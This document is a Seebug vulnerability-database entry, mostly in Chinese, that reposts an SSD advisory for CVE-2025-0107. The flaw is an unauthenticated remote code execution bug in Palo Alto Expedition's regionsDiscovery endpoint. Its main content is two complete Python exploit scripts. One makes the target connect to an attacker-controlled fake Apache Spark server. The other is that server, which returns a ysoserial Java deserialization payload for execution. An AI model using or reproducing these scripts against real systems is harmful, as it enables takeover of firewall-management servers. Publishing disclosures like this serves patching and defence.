SSV-99913
摘要
漏洞概要:Palo Alto Expedition RCE 漏洞(CVE-2025-0107)
正文
Palo Alto Expedition RCE 漏洞(CVE-2025-0107) 关注 0 基本字段 漏洞编号: SSV-99913 披露/发现时间: 未知 提交时间: 2025-01-23 漏洞等级: 漏洞类别: 命令执行 影响组件: Palo Alto Expedition (version <= 1.2.101) 漏洞作者: 未知 提交者: Knownsec CVE-ID: CVE-2025-0107 CNNVD-ID: 补充 CNVD-ID: 补充 ZoomEye Dork: 补充 来源 https://ssd-disclosure.com/ssd-advisory-palo-alto-expedition-rce-regionsdiscovery/ 漏洞详情 贡献者 共获得 0KB ## Summary A vulnerability in Palo Alto Expedition allows remote attackers who can reach the web interface to execute arbitrary code. ## Credit An independent security researcher working with SSD Secure Disclosure. ## Vendor Response Palo Alto has released the following advisory and fix: https://security.paloaltonetworks.com/PAN-SA-2025-0001 ## Affected Versions Palo Alto Expedition version 1.2.101 and prior ## CVE CVE-2025-0107 Technical Analysis A vulnerability in the /API/regionsDiscovery.php endpoint allows unauthenticated attackers to trigger a call to an Apache Spark server (attacker controlled) which can then be used to cause the execution of arbitrary code. This is done by returning a Java compiled package as the response from our (fake) Apache Spark server which is then executed by the Palo Alto Expedition server. Exploit ``` #!/usr/bin/python3 # Exploit import sys import requests if __name__ == "__main__": if len(sys.argv) != 3: print("python3 exp.py https://127.0.0.1 8.8.8.8:1234") sys.exit(0) url = sys.argv[1] spark_addr = sys.argv[2] params = { "master": f"spark://{spark_addr}", "mask": "26", "project": "your_project", "devices": "device1,device2", "mtserver": "127.0.0.1:3306", "mtuser": "root", "mtpassword": "paloalto", "task-id": "1193", "mode": "pre-analysis", "regions": "", "parquetPath": "/tmp", "timezone": "Europe/Helsinki", "mlserver": "127.0.0.1", "debug": "false", "initDate": "2023-01-01", "endDate": "2023-01-31", } res = requests.get( f"{url}/API/regionsDiscovery.php", params=params, verify=False, ) print(f"exploit ok! {res}") ``` ``` #!/usr/bin/python3 # Fake Spark Server import os import struct import sys from socketserver import BaseRequestHandler, ThreadingTCPServer class EchoHandler(BaseRequestHandler): def handle(self): print("Got connection from %s" % (str(self.client_address))) while True: msg = self.request.recv(8192) print(msg) if not msg: break if len(msg) > 16: print("Send msg>>>") self.request.sendall(build_msg(msg[9:17])) def build_msg(request_id): # Read the payload as binary data payloadObj = open(sys.argv[2], "rb").read() msg_type = b"\x04" head_length = 21 # Construct message msg = struct.pack(">Q", len(payloadObj) + 21) + msg_type + request_id msg += struct.pack(">I", len(payloadObj)) + payloadObj return msg if __name__ == "__main__": if len(sys.argv) < 3: print( "Usage: python %s <port / 3306> </path/to/payload>" % os.path.basename(sys.argv[0]) ) print( 'java -jar ysoserial-all.jar CommonsBeanutils1 "touch /tmp/hack" > payload' ) sys.exit() serv = ThreadingTCPServer(("0.0.0.0", int(sys.argv[1])), EchoHandler) print("Server listening on 0.0.0.0:%s" % sys.argv[1]) serv.serve_forever() ``` 共 0 兑换了 PoC 暂无 PoC 参考链接 解决方案 临时解决方案 暂无临时解决方案 官方解决方案 暂无官方解决方案 防护方案 暂无防护方案 完善解决方案 返回 提交 生命线 发现/披露了漏洞 Knownsec 2025-01-23 提交了漏洞 Knownsec 2025-01-23 提交补充了漏洞详情 相关漏洞 Palo Alto Expedition RCE 漏洞(CVE-2025-0107) Palo Alto Expedition 多个漏洞(CVE-2024-5910 & CVE-2024-9464 & CVE-2024-9465 & CVE-2024-9463) 关注 0 人气 20588 0 评论前需绑定手机 现在绑定 提交评论 匿名回复 暂无评论 ※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
标签
- source:seebug
- type:vuln
扩展字段
{
"ssvid": "ssvid-99913"
}